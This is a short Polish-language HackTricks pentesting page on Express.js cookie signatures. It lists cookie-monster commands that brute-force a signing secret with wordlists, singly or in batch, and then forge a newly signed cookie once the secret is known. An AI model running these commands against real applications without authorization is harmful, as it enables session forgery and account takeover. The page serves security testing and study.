NodeJS Express

Reading time: 2 minutes

tip

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Ucz się i ćwicz Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Wsparcie dla HackTricks

Podpis ciasteczka

Narzędzie https://github.com/DigitalInterruption/cookie-monster jest użytecznością do automatyzacji testowania i ponownego podpisywania tajemnic ciasteczek Express.js.

Pojedyncze ciasteczko o określonej nazwie

bash
cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -n session

Niestandardowa lista słów

bash
cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -w custom.lst

Testowanie wielu ciasteczek w trybie wsadowym

bash
cookie-monster -b -f cookies.json

Testowanie wielu ciasteczek za pomocą trybu wsadowego z niestandardową listą słów

bash
cookie-monster -b -f cookies.json -w custom.lst

Jeśli znasz sekret, możesz podpisać ciastko.

bash
cookie-monster -e -f new_cookie.json -k secret

tip

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Ucz się i ćwicz Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Wsparcie dla HackTricks